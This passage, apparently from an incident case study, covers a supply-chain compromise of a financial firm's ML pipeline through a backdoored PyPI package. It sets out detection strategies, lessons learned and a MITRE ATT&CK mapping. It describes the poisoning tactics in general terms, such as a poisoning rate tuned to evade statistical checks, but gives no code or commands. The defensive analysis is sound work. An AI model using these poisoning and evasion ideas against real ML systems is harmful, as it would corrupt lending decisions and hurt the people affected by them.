The initial compromise entered through a backdoored PyPI package. Organizations should implement hash-pinned dependencies (pip install --require-hashes), maintain an internal PyPI mirror with security scanning, generate SBOMs for ML environments, and monitor for unexpected package version changes. Automated binary analysis of all dependency updates would have detected the post-install hook and embedded payload.
Detection Strategy 2: Feature Store Integrity Monitoring
The attacker modified feature values during the transformation pipeline. Continuous comparison of processed features against independently calculated values from raw source data would detect discrepancies. Implementing "canary records" (known-good records with expected feature values) in every training batch provides a tamper-detection mechanism.
Detection Strategy 3: Cumulative Model Drift Detection
Individual model versions passed quality gates, but the cumulative trend showed consistent degradation. Model monitoring should track cumulative drift over rolling windows, not just per-version deltas. Alert on sustained directional drift even when individual changes are within tolerance.
Detection Strategy 4: Approval Rate Anomaly Detection by Risk Segment
The fraud detection system eventually caught the anomaly through approval rate monitoring, but the alert threshold (25 percentage points) was too high. More granular monitoring by credit score bucket with lower thresholds (10pp) and shorter lookback windows would have detected the pattern weeks earlier.
Detection Strategy 5: Shadow Model Comparison
Maintaining a parallel "shadow" model trained on verified clean data and comparing its predictions against the production model would immediately detect decision boundary shifts. When the production model approves an application that the shadow model denies, that divergence should trigger investigation.
Lessons Learned¶
Key Takeaways
-
ML pipelines are high-value attack surfaces with unique risks -- Traditional security controls (firewalls, EDR, SIEM) do not monitor for ML-specific attacks like training data poisoning, feature manipulation, or model drift. Organizations deploying ML for critical decisions must implement ML-specific security monitoring including feature integrity checking, model drift detection, and training data provenance.
-
Supply chain attacks on ML dependencies can be devastatingly subtle -- A single compromised Python package can manipulate model behavior without triggering any traditional security alerts. The 0.089% poisoning rate was specifically designed to evade statistical detection thresholds. ML dependency management requires the same rigor as production software supply chains: hash pinning, SBOM generation, and automated binary analysis.
-
Model governance cadence must match the threat tempo -- Quarterly model risk management reviews cannot detect attacks operating on weekly retraining cycles. Model governance should include continuous automated monitoring with human review triggered by cumulative drift, not just periodic scheduled reviews.
-
The gap between data science and security teams creates blind spots -- PFG's ML infrastructure operated with minimal security team visibility. ML pipeline security requires joint ownership between data science and security teams, with shared monitoring, incident response procedures, and threat modeling exercises specific to ML attack vectors.
-
Financial fraud detection must account for AI-era attack patterns -- Traditional fraud rules based on transaction patterns and velocity are insufficient when attackers can manipulate the decision-making model itself. Fraud detection must include model integrity monitoring as a first-class signal, not just transaction-level analysis.
-
Canary records and shadow models provide defense-in-depth for ML systems -- Embedding known-good test records in training data and maintaining independent shadow models for comparison creates detection capabilities that are resilient to adversarial manipulation of monitoring thresholds.
MITRE ATT&CK Mapping¶
| Technique ID | Technique Name | Phase |
|---|---|---|
| T1195.002 | Supply Chain Compromise: Software Supply Chain | Initial Access (compromised PyPI package) |
| T1059.006 | Command and Scripting Interpreter: Python | Execution (backdoor in package post-install) |
| T1565.001 | Data Manipulation: Stored Data Manipulation | Impact (training data poisoning) |
| T1071.001 | Application Layer Protocol: Web Protocols | C2 (payload download and credential exfil) |
| T1567 | Exfiltration Over Web Service | Exfiltration (feature store credentials to C2) |
| T1027 | Obfuscated Files or Information | Defense Evasion (backdoor hidden in legitimate package) |
| T1070 | Indicator Removal | Defense Evasion (poisoning within statistical noise) |
| T1078 | Valid Accounts | Persistence (compromised PyPI maintainer account) |